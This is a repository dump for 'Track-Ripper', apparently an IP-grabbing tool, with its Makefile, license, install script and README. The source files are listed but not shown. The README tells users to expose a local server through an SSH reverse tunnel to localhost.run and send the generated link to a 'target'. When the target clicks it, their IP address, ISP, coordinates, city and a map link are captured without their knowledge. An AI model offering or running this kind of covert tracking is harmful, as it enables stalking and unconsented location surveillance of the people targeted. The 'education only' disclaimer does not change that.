├── link.jpg
├── Track-Ripper.jpg
├── Makefile
├── LICENSE
├── install.sh
├── README.md
├── Track-Ripper.py
└── site
└── index.html
/link.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Whomrx666/Track-Ripper/HEAD/link.jpg
--------------------------------------------------------------------------------
/Track-Ripper.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Whomrx666/Track-Ripper/HEAD/Track-Ripper.jpg
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | INSTALL_SCRIPT = install.sh
2 | PYTHON_SCRIPT = Track-Ripper.py
3 |
4 | all: install run
5 |
6 | install:
7 | @echo "Running install.sh to install dependencies..."
8 | @chmod +x $(INSTALL_SCRIPT)
9 | @./$(INSTALL_SCRIPT)
10 |
11 | run:
12 | @echo "Running Track-Ripper.py..."
13 | @python3 $(PYTHON_SCRIPT)
14 |
15 | clean:
16 | @echo "Cleaning temporary files..."
17 |
18 | help:
19 | @echo "Makefile for running Track-Ripper By Mr.X"
20 | @echo "Available targets:"
21 | @echo " all : Install dependencies and run main.py"
22 | @echo " install : Install dependencies using install.sh"
23 | @echo " run : Run Track-Ripper.py"
24 | @echo " clean : Clean temporary files (if any)"
25 | @echo " help : Display this information"
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2024 Mr.X
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | RED='\033[0;31m'
4 | GREEN='\033[0;32m'
5 | YELLOW='\033[0;33m'
6 | CYAN='\033[0;36m'
7 | NC='\033[0m'
8 |
9 | check_installation() {
10 | if ! command -v "$1" &> /dev/null
11 | then
12 | echo -e "${RED}Error: $1 not found!${NC}"
13 | return 1
14 | else
15 | echo -e "${GREEN}$1 is already installed.${NC}"
16 | return 0
17 | fi
18 | }
19 |
20 | echo -e "${CYAN}Checking if Python and pip are installed...${NC}"
21 |
22 | check_installation python3
23 | if [ $? -ne 0 ]; then
24 | echo -e "${RED}Python3 is not installed. Please install Python3 first.${NC}"
25 | exit 1
26 | fi
27 |
28 | check_installation pip3
29 | if [ $? -ne 0 ]; then
30 | echo -e "${RED}pip3 is not installed. Please install pip3 first.${NC}"
31 | exit 1
32 | fi
33 |
34 | echo -e "${GREEN}All base packages are installed.${NC}"
35 | echo -e "${CYAN}Starting dependency installation...${NC}"
36 |
37 | pip3 install Flask requests rich pycountry
38 |
39 | if [ $? -eq 0 ]; then
40 | echo -e "${GREEN}All dependencies installed successfully!${NC}"
41 | else
42 | echo -e "${YELLOW}There was an issue installing with pip3.${NC}"
43 | echo -e "${CYAN}Trying alternative installation method...${NC}"
44 |
45 | if command -v apt-get &> /dev/null; then
46 | sudo apt-get update
47 | sudo apt-get install python3-pip python3-dev
48 | pip3 install Flask requests rich pycountry
49 | elif command -v pkg &> /dev/null; then
50 | pkg update
51 | pkg install python
52 | pip install Flask requests rich pycountry
53 | else
54 | echo -e "${RED}Unable to identify the package manager system.${NC}"
55 | exit 1
56 | fi
57 | fi
58 |
59 | echo -e "${GREEN}Installation complete! All dependencies are installed. Type (make run) to start.${NC}"
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Track-Ripper
2 | 
3 |
4 | ## introduction
5 | Track-Ripper is a simple tool that can be used to track someone easily which can be used to track fraudsters or other criminals
6 |
7 | ## Instalations
8 | ```
9 | $ pkg update -y && pkg upgrade -y
10 | $ apt update -y && apt upgrade -y
11 | $ pkg install git
12 | $ pkg install python -y
13 | $ git clone https://github.com/Whomrx666/Track-Ripper.git
14 | $ cd Track-Ripper
15 | $ bash install.sh
16 | $ make run
17 | ```
18 |
19 | ## Instructions
20 | - **first**: Install tools according to the instructions above
21 | - **second**: After entering the initial display of the tool, a text will appear that will direct you to copy the text that says ssh -R 80:localhost:8080 nokey@localhost.run
22 | - **third**: Open a new page in the terminal and copy paste the text you copied earlier into the terminal you just opened
23 | - **Fourth**: The tool will automatically create a link for you to copy
24 | - **Last**: Copy the link and send it to the target. If the target clicks on it, the target address will appear in your terminal
25 |
26 | # The link you have to copy for the target!
27 |
28 |
29 |
30 | ## 🕵️ What Information Can Be Retrieved?
31 |
32 | - 🌍 Geographical Location
33 | - Country
34 | - Region/Province
35 | - City
36 | - Google maps Link
37 |
38 | - 🌐 Network Details
39 | - Hostname
40 | - Ip address
41 | - Internet Service Provider (ISP)
42 | - Timezone
43 | - Geographical Coordinates
44 | - Organization
45 | - Postal code
46 |
47 | ## Observation
48 | This is a tool for education only, I am not responsible for any misuse
49 | ### Original Author
50 |
51 |
52 | ### <<< If you copy , Then Give me The Credits >>>
53 |
54 | ## CONNECT WITH ME :
55 |
56 | [](https://whomrxhackers.blogspot.com/)
57 | [](https://twitter.com/whomrx666)
58 | [](https://wa.Googleme/6285926601133?text=Halo%2C%20Mr.X)
59 | [](https://www.facebook.com/whomrx.666)
60 | [](https://t.me/Whomr_X)
61 | [](mailto:whomrx666@gmail.com)
62 | [](https://www.tiktok.com/@whomr.x)
63 |
64 | **If you want to donate, click on the button**
65 |
66 |
67 | ---
68 |
69 |